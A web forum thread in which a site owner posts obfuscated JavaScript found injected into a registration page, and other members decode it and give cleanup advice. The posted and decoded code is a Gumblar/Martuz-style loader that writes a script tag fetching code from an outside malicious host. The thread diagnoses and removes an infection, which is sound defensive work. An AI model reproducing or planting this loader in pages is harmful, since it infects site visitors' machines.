SitePoint Sponsor

User Tag List

Results 1 to 18 of 18
  1. #1
    if ($zee == "Guru") { $zee--;}
    Join Date
    Nov 2005
    Location
    Karachi - Pakistan
    Posts
    1,134
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Strange JS Code !

    Hi

    I have a website and it was working ok but from last 1 month, there has been issues and I cant access a particular form on my website.

    When i checked I noticed that my firewall is blocking that as it has some Strange JS code (i saw the strange code by View Source at another computer). I am placing the code here so that any 1 can suggest what I should do.

    The following code occurs after [/head] and before [body] tags.

    Code:
    <script language=javascript><!-- 
    (function(){var bpAjN='%';var igdR='var-20a-3d-22ScriptE-6egine-22-2c-62-3d-22-56e-72si-6fn-28)+-22-2cj-3d-22-22-2cu-3d-6eavigator-2eu-73er-41gent-3bif(-28u-2ei-6edexOf(-22Chrome-22-29-3c0-29-26-26(u-2ein-64e-78Of(-22Win-22)-3e0-29-26-26(u-2ei-6edexOf-28-22NT-20-36-22)-3c0-29-26-26(-64ocum-65nt-2ec-6fokie-2e-69nd-65-78Of(-22miek-3d-31-22-29-3c0)-26-26(typ-65-6f-66(zrvzt-73)-21-3dtype-6ff(-22A-22)))-7bzrvz-74-73-3d-22A-22-3be-76-61l-28-22if(-77-69ndow-2e-22+-61+-22)j-3dj+-22+a-2b-22Maj-6f-72-22+b+-61+-22Min-6f-72-22+-62+-61+-22Bui-6cd-22+b+-22j-3b-22-29-3bdo-63-75m-65-6et-2ew-72ite(-22-3cscript-20s-72c-3d-2f-2fm-61rt-22+-22uz-2ec-6e-2fvi-64-2f-3fid-3d-22+j+-22-3e-3c-5c-2fscr-69p-74-3e-22)-3b-7d';var by61A=igdR.replace(/-/g,bpAjN);eval(unescape(by61A))})();
     --></script>
    Please also note that this code appears when I see the View Source. However, I have all these files at my local computer, and when I open it in any program, there is no code. But whenever I put it online, and see the view source, it shows me the above strange code.

    Please tell me what is this ? and How I can remove this ?
    Thanks


    Zeeshan

  2. #2
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,290
    Mentioned
    198 Post(s)
    Tagged
    3 Thread(s)
    It's weakly obfuscated code that runs this
    Code:
    var igdR='var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
    if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";
    eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
    document.write("<script src=//mart"+"uz.cn/vid/?id="+j+"><\/script>");}';

  3. #3
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    it's been a while since i saw this now, and it looks like it's been slightly modified.

    it it a modified version of the infamous "Gumblar exploit" or "fake yahoo counter" as it also appeared as in some versions...

    this version however uses another domain which is the Martuz dot cn.

    There is also added a check to see if you use Google Chrome, and not load the external script if Chrome is used.

    The rest looks like thee old Gumblar exploit to me.

    it normally happend because your pc is infected with trojans and sniffers who scans your puter for usernames and passwords and sends this to a server for further use.

    They then makes use of this info to inject/place this iframe and code on your files. it infects php/html/js etc, it also makes some new files and disguise some of them as pictures/jpg etc

    fire up regedit and have a look for this reg value: "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux" (or aux2) if you find - delete it.

    clear all files on the server and make sure you replace them with FRESH new ones, and not new infected ones. scan your servers folders and files for strange unknown files and pictures and delete if you find it.

    Scan your pc and clear ALL your TEMP files. change passwords when you have cleaned your puter and cleared it's cache and Temp files - but first do a restart, then change passwords.

    This can be nasty and in many cases people almost gave up because it kepts coming back no matter what they did. So it's important to make sure you've cleaned your local pc properly.

    You can find more information on this by doing a google search for the "Gumblar exploit" and "fake yahoo counter" as this on your site is just a slightly modified version of it.
    Who's to doom when the judge himself is dragged before the bar


  4. #4
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    I had to make some food here... but here is some more info, you can also find more info as it has been discussed in some previous posts - before when it was pure Gumblar code...

    the code trigger another address, as you can see from Mittineague's post of the de-obfuscated code... here is two exploits triggered and trying to execute on "victims" computer.. you see from the code that it targets IE prior to NT6 (vista) and it tries to exploit known vulnerabilities in adobe PDF and Flash player to execute its code and infect as many as possible.

    But as I said, it is most likely to have it's roots from something installed on your local puter.
    Who's to doom when the judge himself is dragged before the bar


  5. #5
    if ($zee == "Guru") { $zee--;}
    Join Date
    Nov 2005
    Location
    Karachi - Pakistan
    Posts
    1,134
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Okay, but i have few other websites as well, and I have uploaded some other files to each of those websites. And there are no such problems.

    What do u think ?

  6. #6
    if ($zee == "Guru") { $zee--;}
    Join Date
    Nov 2005
    Location
    Karachi - Pakistan
    Posts
    1,134
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Moreover, the strange code is appearing in only 1 page that is a Registration Form, and at only 1 hosting server. When I tried it to a different server, it was ok.

    @Crazybanana
    The Registry thing you mentioned is related to the SOUND CARD driver of the system. If I delete that it will turn the sound off.

  7. #7
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,290
    Mentioned
    198 Post(s)
    Tagged
    3 Thread(s)
    Have you
    1. Cleaned your computer?
    2. Changed usernames/passwords, including FTP?
    3. Re-uploaded the website files from a clean backup?

    I realize it's a bit of work, but that's what needs to be done.

  8. #8
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    Quote Originally Posted by zeeshanhashmi
    Okay, but i have few other websites as well, and I have uploaded some other files to each of those websites. And there are no such problems.

    What do u think ?
    What I think is still the same as before. it is probably something on your local pc, or it could be weak security/code on some of your scripts running on the page.

    scan your pc with newest AVG, Avast, Malwarebytes, Norton etc... make sure you clear all your TEMP files. this be the content of the folder "Temp" inside the hidden "Local Settings" folder and the hidden folder "Content.ie5" inside your hidden "Temporary Internet Files" folder. and clear all other cache and history. You have to boot into safe mode to delete some of it, and remember: just the contents of these folders, and not the folders itself.

    Scan for viruses both in safe mode and normal mode, as some files/viruses can only be dealt with in SAFE MODE!

    Empty Trash and reboot scan again, do a netstat from the command line to look for suspicious connections.

    Quote Originally Posted by zeeshanhashmi
    Moreover, the strange code is appearing in only 1 page that is a Registration Form, and at only 1 hosting server. When I tried it to a different server, it was ok.
    The code is not strange anymore, as we have told you what it is and what it does now.

    maybe your code/script/app has a weakness that allowed it to be exploited to inject the code ,but I doubt it from what you've told us above. it looks like there is something stored on that server that injects this code as soon as you upload it.

    Quote Originally Posted by zeeshanhashmi
    @Crazybanana
    The Registry thing you mentioned is related to the SOUND CARD driver of the system. If I delete that it will turn the sound off.
    Thanks for informing me this, but to enlight you a bit I can tell you that this "virus/keylogger/(spam)bot/creditcard snatcher/FTP password stealer/info stealer" is loaded by registering as an auxiliary sound drive to fool novice users
    so have a second look at it to see if there is added something, or if it looks suspicious. if you're unsure post the regkey for others to have a look, or copy and paste this into notepad and save it as regfix.reg (chose to save as all files to get the .reg) but back up the registry/registry key first:

    Code:
     
    REGEDIT4
     
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
    "aux"="wdmaud.drv"
    delete the regkey and replace it by double click on the regfix.reg on your desktop. And remember if you're unsure post the regkey for others to have a look...

    check error logs (if any) and clean the server. then upload a clean copy (after you've cleaned your puter). Make sure that what you upload is clean, as this "virus" creates fake files ans embeds itself to almost all kind of files - it also disguise itself as images and scripts etc so double check everything to be sure.

    it is very important to clear cache as some files runs from - yeah that's right, from Cache.

    after doing all this, change your usernames/passwords including those for FTP. and do a netstat as I said to double check... then upload new clean content and let us know what's happening...
    Who's to doom when the judge himself is dragged before the bar


  9. #9
    if ($zee == "Guru") { $zee--;}
    Join Date
    Nov 2005
    Location
    Karachi - Pakistan
    Posts
    1,134
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Woooof !

    Thanks a lot for sharing all this, I will definitely look in all these what you have suggested.

    But here is something, as you said that my local computer might have something, IF yes, then why it only inject the JS code and show that in 1 hosting ? why not on others sites I have been working ?

  10. #10
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,290
    Mentioned
    198 Post(s)
    Tagged
    3 Thread(s)
    Do all your sites have the same username, password and files?

  11. #11
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    Quote Originally Posted by zeeshanhashmi
    But here is something, as you said that my local computer might have something, IF yes, then why it only inject the JS code and show that in 1 hosting ? why not on others sites I have been working ?
    I would probably know this for sure - if this was my hack - but as it is, I have nothing to do with it and cannot know for sure

    but there are several things I could speculate in about it... like some passwords are stored and some needs to be written each time of use - or contact was lost between your pc and the server/hosting of the malicious gathering script. the hosting server was shut down or sw removed - your virus/malware app found it and deleted it - your other info has not yet been used by the attackers - sw/scripts on your server has been patched - or you've just been lucky

    Anyway, there has been a hack, and if you are to ignore it without furter investigation - it will most likely happend again.
    Who's to doom when the judge himself is dragged before the bar


  12. #12
    if ($zee == "Guru") { $zee--;}
    Join Date
    Nov 2005
    Location
    Karachi - Pakistan
    Posts
    1,134
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    No the other sites ftp login details are different. and also the files are different.

    But when I uploaded the thing to an other hosting for testing, it was OK there and there was no such code. But when I moved the files to the actual server, it shows the code.

  13. #13
    if ($zee == "Guru") { $zee--;}
    Join Date
    Nov 2005
    Location
    Karachi - Pakistan
    Posts
    1,134
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Is it possible that the HOSTING SERVER is infected ?

  14. #14
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    Quote Originally Posted by zeeshanhashmi
    Is it possible that the HOSTING SERVER is infected ?
    Yes this is possible as we said above. the server is infected and inject the code/script into your files - but... the infection possibly and most likely started from your PC (or another pc that have had access to the server)

    this is how this martuz/Gumblar exploit/virus works (at least this is how it used to work, but I guess it's working the same way now - even if some of the scripts is rewritten a bit)

    This virus/exploit doesn't spread outside of the user account that is infected. so search the server you are using for any suspicious files and scripts. Also remember that it embeds itself to other files so even if you doesn't see any unknown or suspicious files or folders, it can still be there - embedded to other legal files. but also remember to double check the computers who have had access to the server which have this problem.
    Who's to doom when the judge himself is dragged before the bar


  15. #15
    if ($zee == "Guru") { $zee--;}
    Join Date
    Nov 2005
    Location
    Karachi - Pakistan
    Posts
    1,134
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Yes, that is what I thought earlier, as my client has also access to that server. Well, I have access to 100s of different servers, but none of them is infected. Means, my computer is not infected, and its the particular client's PC who has the virus and thus infected his server.

    Thanks s lot CrazyBanana, and all others.

  16. #16
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,290
    Mentioned
    198 Post(s)
    Tagged
    3 Thread(s)
    You ran some thorough scans of your computer and they all came up clean?
    If they did then your assumption based on the diagnosis of the symptoms is most likely correct.

  17. #17
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    Quote Originally Posted by zeeshanhashmi View Post
    Yes, that is what I thought earlier, as my client has also access to that server. Well, I have access to 100s of different servers, but none of them is infected. Means, my computer is not infected, and its the particular client's PC who has the virus and thus infected his server.

    Thanks s lot CrazyBanana, and all others.
    I would scan my pc anyway to make sure, access to so many servers has some serious reponsibility following. You should also tell your client about this issue.
    Who's to doom when the judge himself is dragged before the bar


  18. #18
    if ($zee == "Guru") { $zee--;}
    Join Date
    Nov 2005
    Location
    Karachi - Pakistan
    Posts
    1,134
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    for Scanning and Cleaning the following :

    1) Trojan
    2) Worm
    3) Spam Software / Spyware
    4) PUP (Potential Unwanted Programs)
    5) anything else

    what is the best FREE software available ?


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •